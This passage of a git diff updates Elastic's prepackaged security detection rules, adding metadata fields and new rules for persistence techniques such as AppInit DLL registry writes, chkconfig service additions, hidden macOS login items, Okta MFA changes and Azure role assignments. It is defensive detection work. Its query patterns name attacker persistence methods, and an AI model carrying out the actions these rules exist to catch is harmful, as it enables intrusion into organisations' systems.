Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", + "note": "", + "query": "registry where\n registry.path : (\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_application_added_to_google_workspace_domain.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_application_added_to_google_workspace_domain.json new file mode 100644 index 0000000000000..16e33833cdc5c --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_application_added_to_google_workspace_domain.json @@ -0,0 +1,78 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when a Google marketplace application is added to the Google Workspace domain. An adversary may add a malicious application to an organization\u2019s Google Workspace domain in order to maintain a presence in their target\u2019s organization and steal data.", + "false_positives": [ + "Applications can be added to a Google Workspace domain by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Application Added to Google Workspace Domain", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_APPLICATION\n", + "references": [ + "https://support.google.com/a/answer/6328701?hl=en#" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "785a404b-75aa-4ffd-8be5-3334a5a544dd", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 14 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_create_okta_api_token.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_create_okta_api_token.json index 02cc638a7ce0d..6471b1ddef70b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_create_okta_api_token.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_create_okta_api_token.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Create Okta API Token", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:system.api_token.create\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "96b9f4ea-0e8c-435b-8d53-2096e75fcac5", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_deactivate_mfa_for_okta_user_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_deactivate_mfa_for_okta_user_account.json index 29d604a2953ba..8cba9d288ed5c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_deactivate_mfa_for_okta_user_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_deactivate_mfa_for_okta_user_account.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Deactivate MFA for an Okta User Account", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:user.mfa.factor.deactivate\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "cd89602e-9db0-48e3-9391-ae3bf241acd8", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json index 2a2f5acfcc114..a64622fdf188b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Reset MFA Factors for an Okta User Account", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:user.mfa.factor.reset_all\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "729aa18d-06a6-41c7-b175-b65b739b1181", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_account_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_account_created.json index bdae2f42bd04e..cda6d53e906d0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_account_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_account_created.json @@ -11,7 +11,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Automation Account Created", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE\" and event.outcome:(Success or success)\n", "references": [ "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", @@ -19,8 +19,33 @@ "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "df26fd74-1baa-4479-b42e-48da84642330", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -64,5 +89,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_runbook_created_or_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_runbook_created_or_modified.json index 0c6a82d37701b..399ba22052ea7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_runbook_created_or_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_runbook_created_or_modified.json @@ -11,7 +11,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Automation Runbook Created or Modified", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\n (\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION\"\n ) and\n event.outcome:(Success or success)\n", "references": [ "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", @@ -19,8 +19,33 @@ "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "16280f1e-57e6-4242-aa21-bb4d16f13b2f", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -32,5 +57,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_webhook_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_webhook_created.json index 2b8110b8e7d54..1dae98188ea70 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_webhook_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_webhook_created.json @@ -11,7 +11,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Automation Webhook Created", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\n (\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/ACTION\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/WRITE\"\n ) and\n event.outcome:(Success or success)\n", "references": [ "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", @@ -19,8 +19,33 @@ "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", "https://www.ciraltos.com/webhooks-and-azure-automation-runbooks/" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -32,5 +57,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_conditional_access_policy_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_conditional_access_policy_modified.json index 5ef30a8086887..5ddd859779bc2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_conditional_access_policy_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_conditional_access_policy_modified.json @@ -11,13 +11,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Conditional Access Policy Modified", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:(azure.activitylogs or azure.auditlogs) and\nevent.action:\"Update conditional access policy\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + }, + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "bc48bba7-4a23-4232-b551-eca3ca1e3f20", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_global_administrator_role_assigned.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_global_administrator_role_assigned.json index 4b22ab50a41aa..8f7c2e8225c6c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_global_administrator_role_assigned.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_global_administrator_role_assigned.json @@ -11,13 +11,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure AD Global Administrator Role Assigned", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and\nazure.auditlogs.operation_name:\"Add member to role\" and\nazure.auditlogs.properties.target_resources.0.modified_properties.1.new_value:\"\\\"Global Administrator\\\"\"\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.target_resources.0.modified_properties.1.new_value", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "04c5a96f-19c5-44fd-9571-a0b033f9086f", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -43,7 +72,7 @@ "subtechnique": [ { "id": "T1098.003", - "name": "Add Office 365 Global Administrator Role", + "name": "Additional Cloud Roles", "reference": "https://attack.mitre.org/techniques/T1098/003/" } ] @@ -53,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_pim_user_added_global_admin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_pim_user_added_global_admin.json index 4ee9f8074985b..5e250c030ff58 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_pim_user_added_global_admin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_pim_user_added_global_admin.json @@ -13,13 +13,47 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Global Administrator Role Addition to PIM User", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and\n azure.auditlogs.operation_name:(\"Add eligible member to role in PIM completed (permanent)\" or\n \"Add member to role in PIM completed (timebound)\") and\n azure.auditlogs.properties.target_resources.*.display_name:\"Global Administrator\" and\n event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.target_resources.*.display_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -48,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_privileged_identity_management_role_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_privileged_identity_management_role_modified.json index 214100ffced5c..781dd064087ad 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_privileged_identity_management_role_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_privileged_identity_management_role_modified.json @@ -11,14 +11,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Privilege Identity Management Role Modified", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating Azure Privilege Identity Management Role Modified\n\nAzure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and\nmonitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles\nsuch as Global Administrator and Application Administrator. \n\nThis rule identifies the update of PIM role settings, which can indicate that an attacker has already gained enough\naccess to modify role assignment settings. \n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the user who issued the command. Do they look normal for the user?\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal\ntime of day?\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the account's commands, API calls, and data management actions in the last 24 hours.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this activity didn't follow your organization's change management policies, it should be reviewed by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Restore the PIM roles to the desired state.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Update role setting in PIM\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-resource-roles-assign-roles", "https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "7882cebf-6cf1-4de3-9662-213aa13e8b80", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -62,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_chkconfig_service_add.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_chkconfig_service_add.json new file mode 100644 index 0000000000000..f50fd5bf88b0b --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_chkconfig_service_add.json @@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence.", + "from": "now-9m", + "index": [ + "logs-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Chkconfig Service Add", + "query": "process where event.type == \"start\" and \n (process.executable : \"/usr/sbin/chkconfig\" and process.args : \"--add\") or \n (process.args : \"*chkconfig\" and process.args : \"--add\")\n", + "references": [ + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 74, + "rule_id": "b910f25a-2d44-47f2-a873-aabdc0d355e6", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Persistence", + "Lightning Framework" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_change_launch_agents_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_change_launch_agents_file.json index b94bbc9cf5117..49eab1a2e8c5e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_change_launch_agents_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_change_launch_agents_file.json @@ -18,6 +18,33 @@ "references": [ "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "082e3f8c-6f80-485c-91eb-5b112cb79b28", "severity": "low", @@ -53,5 +80,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_hidden_login_item_osascript.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_hidden_login_item_osascript.json index d069fb44ec27c..310538c93a7c9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_hidden_login_item_osascript.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_hidden_login_item_osascript.json @@ -11,10 +11,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation of Hidden Login Item via Apple Script", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*login item*hidden:true*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_modif_launch_deamon_sequence.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_modif_launch_deamon_sequence.json index c01a562426ea6..6b3f1bbe4005b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_modif_launch_deamon_sequence.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_modif_launch_deamon_sequence.json @@ -14,10 +14,37 @@ "language": "eql", "license": "Elastic License v2", "name": "LaunchDaemon Creation or 